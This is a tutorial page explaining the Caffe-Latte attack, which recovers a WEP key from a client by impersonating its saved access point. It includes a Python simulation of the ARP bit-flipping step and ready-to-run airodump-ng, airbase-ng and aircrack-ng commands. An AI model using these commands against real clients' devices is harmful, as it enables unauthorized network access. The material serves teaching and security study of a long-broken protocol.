# Caffe-Latte

This attack is called **Caffe-Latte** because of how little time it needs: the WEP key can be recovered in roughly the time it takes to drink a coffee, from an isolated client (for example a laptop in a café) that is nowhere near the real network.

Unlike other WEP attacks, this one does not target the access point directly; it targets clients that have the network's WEP key stored and will try to reconnect to it.

The idea behind the attack is that **WEP** authentication is one-way: the client has to prove it knows the key, while the Access Point does **NOT** prove anything to the client.

This lack of mutual authentication means that an attacker can impersonate an AP by copying its **ESSID (name)** and, if the client configuration demands it, its **BSSID (MAC address)**, get the client to associate, and then make it "do things".

### Theory

1. An attacker creates a **Wi-Fi access point (AP)** with an **ESSID** exactly the same **(the BSSID can also be copied if desired)** as the one stored on the victim PC. This network advertises **WEP security**, but with a different key than the client's (the real key is NOT known). **Although the attacker and the victim have different keys**, WEP lets the client get as far as association, because the fake AP simply accepts whatever the client sends.
2. With shared-key authentication the fake AP sends the client a challenge (fourth arrow; from attacker to client), which is a block of random plaintext. The client returns it WEP-encrypted with the shared key (fifth arrow), and the FAKE Access Point, which cannot verify the response because it does not know the key, replies "Authentication Success" anyway (sixth arrow).

<figure><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fimage.slidesharecdn.com%2Ftoorconcaffelatteattack-090918052912-phpapp01%2F95%2Fcaffe-latte-attack-9-728.jpg%3Fcb%3D1253258050&#x26;f=1&#x26;nofb=1&#x26;ipt=652210dbd8db9bc61735f2986af5339c6bee2165c513e0d59ecf84f5f6a637ad&#x26;ipo=images" alt=""><figcaption></figcaption></figure>

* Once the association is established, the client will try to obtain an IP via **DHCP (but the fake access point will not run DHCP)**, and after a timeout the **client's OS will automatically assign itself a link-local address from the APIPA range** (169.254.0.0/16, mask 255.255.0.0; RFC 3927 uses 169.254.1.0 to 169.254.254.255). The client will then send gratuitous ARPs announcing the address it has self-assigned, to detect conflicts, as shown in the following image. These ARPs are WEP-encrypted with the real key, and their layout is known, which is exactly what the next step needs.

<figure><img src="https://mundo-hackers.weebly.com/uploads/9/8/5/0/98506118/published/imagen-2013-09-06-a-las-14-48-58-1024x752.jpg?1490891447" alt=""><figcaption></figcaption></figure>

* The next and last step is performed by the fake AP. Taking the captured gratuitous ARP (still encrypted), the fake AP flips bits in the ciphertext so that the sender MAC and sender IP change while the target IP, the client's own, stays the same; because RC4 is a stream cipher and the WEP ICV is a plain CRC32 (linear), the encrypted ICV can be corrected without knowing the key. The result is a valid, encrypted ARP request for the client's IP from some other host, which the fake AP replays at high rate. The client answers each one with an encrypted ARP reply carrying a fresh IV, and in a short time we have enough IVs to crack the WEP key.

<figure><img src="https://mundo-hackers.weebly.com/uploads/9/8/5/0/98506118/published/imagen-2013-09-06-a-las-15-33-36-1024x756.jpg?1490891520" alt=""><figcaption></figcaption></figure>
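The bit-flipping step above (turning the client's encrypted gratuitous ARP into an encrypted ARP request for the client, without the key) simulated end to end in Python. This is an added example written for this page, not code from the original page or from the aircrack-ng project; the WEP key, MACs, IV and the 169.254.17.42 client address are constructed sample values, and the LLC/SNAP + ARP layout and WEP framing (IV, key index, RC4 over plaintext plus CRC32 ICV) are the standard ones. airbase-ng's own implementation may differ in detail.

```python
import struct
import zlib

# Constructed sample values for the simulation (not taken from the page).
WEP_KEY = bytes.fromhex("0123456789")          # 40-bit key; only the client knows it
CLIENT_MAC = bytes.fromhex("001122334455")     # sent in clear in the 802.11 header
CLIENT_IP = bytes([169, 254, 17, 42])          # APIPA address the client assigned itself
ATTACKER_MAC = bytes.fromhex("66778899aabb")
IV = bytes.fromhex("102030")

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # LLC/SNAP header, ethertype 0x0806 (ARP)
ARP = len(LLC_SNAP_ARP)                           # offset of the ARP header in the plaintext
OFF_OPER, OFF_SHA, OFF_SPA, OFF_THA, OFF_TPA = ARP + 6, ARP + 8, ARP + 14, ARP + 18, ARP + 24


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: CRC32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def build_arp(oper, sha, spa, tha, tpa):
    """LLC/SNAP + 28-byte ARP packet (Ethernet/IPv4)."""
    return LLC_SNAP_ARP + struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, oper, sha, spa, tha, tpa)


def parse_arp(data):
    return {
        "oper": struct.unpack("!H", data[OFF_OPER:OFF_OPER + 2])[0],
        "sha": data[OFF_SHA:OFF_SHA + 6], "spa": data[OFF_SPA:OFF_SPA + 4],
        "tha": data[OFF_THA:OFF_THA + 6], "tpa": data[OFF_TPA:OFF_TPA + 4],
    }


def wep_encrypt(key, iv, plaintext):
    """Frame body as the client sends it: IV | key index | RC4(plaintext | ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key, frame):
    """What the client does on receipt: decrypt with IV || key and check the ICV."""
    plain = rc4(frame[:3] + key, frame[4:])
    data, got = plain[:-4], plain[-4:]
    return data, got == icv(data)


def flip_to_arp_request(frame, client_mac, attacker_mac):
    """Attacker side, no key needed: turn the client's encrypted gratuitous ARP into an
    encrypted ARP request for the client's IP that appears to come from another host.

    XORing a ciphertext byte with d XORs the plaintext byte with d (RC4 is a stream
    cipher), and CRC32 is linear: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros), so the
    encrypted ICV can be corrected without ever seeing the plaintext."""
    body = bytearray(frame[4:])
    n = len(body) - 4                      # plaintext length, ICV excluded
    delta = bytearray(n)
    # Sender MAC: its plaintext is the client MAC (visible in the 802.11 header),
    # so it can be rewritten to an exact value.
    for k in range(6):
        delta[OFF_SHA + k] = client_mac[k] ^ attacker_mac[k]
    # Sender IP: value unknown, but flipping the low bit of the last octet yields
    # another host in 169.254.0.0/16; the target IP (the client's own) is untouched.
    delta[OFF_SPA + 3] = 0x01
    icv_delta = (zlib.crc32(bytes(delta)) ^ zlib.crc32(bytes(n))) & 0xFFFFFFFF
    for k in range(n):
        body[k] ^= delta[k]
    for k, b in enumerate(struct.pack("<I", icv_delta)):
        body[n + k] ^= b
    return frame[:4] + bytes(body)


def simulate():
    """Client emits a gratuitous ARP, attacker flips it, client decrypts the replay."""
    gratuitous = build_arp(1, CLIENT_MAC, CLIENT_IP, b"\x00" * 6, CLIENT_IP)
    captured = wep_encrypt(WEP_KEY, IV, gratuitous)          # what airodump-ng would see
    forged = flip_to_arp_request(captured, CLIENT_MAC, ATTACKER_MAC)
    data, valid = wep_decrypt(WEP_KEY, forged)               # the client's view of the replay
    return parse_arp(data), valid


if __name__ == "__main__":
    fields, valid = simulate()
    print("ICV valid:", valid, "| ARP request for", ".".join(map(str, fields["tpa"])),
          "from", ".".join(map(str, fields["spa"])))
```

The forged frame decrypts on the client to an ARP request for its own address with a valid ICV, so the client answers it; each replay is answered with a new WEP-encrypted frame and a new IV, which is the traffic the next section collects. The same linearity is why WEP's CRC32 gives no real integrity protection.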

### Execution

* Start by capturing the channel the fake AP will use and writing the packets to a file (the interface must already be in monitor mode, e.g. `airmon-ng start wlan0`). With the prefix below, airodump-ng writes `capturecaffelatte-01.cap`.

```bash
airodump-ng -c 7 -w capturecaffelatte wlan0mon
```

* The second step is to create a fake access point with the same name (ESSID) as the stored network and, if the client requires it, the same MAC address (BSSID). `-L` selects the Caffe-Latte attack, `-W 1` advertises WEP in the beacons so the client believes it is its own network, and `-x 100` replays 100 packets per second.

```bash
airbase-ng -c 7 -a <BSSID> -e 'CaffeLatte' -L -W 1 -x 100 wlan0mon
```

* With these two commands running, the fake AP replays the flipped ARP requests and airodump-ng records the client's encrypted ARP replies (each with a fresh IV); these are the packets that will allow us to crack the WEP key.
* Remember to let the attack run for at least 5 minutes so that enough IVs are collected.
* Once you have waited the 5 minutes, use aircrack-ng on the capture file, selecting the network by ESSID (`-e`) or BSSID (`-b`):

```bash
aircrack-ng -e 'CaffeLatte' capturecaffelatte-01.cap
```

* If aircrack-ng reports that it does not have enough IVs, leave the attack running and try again later.

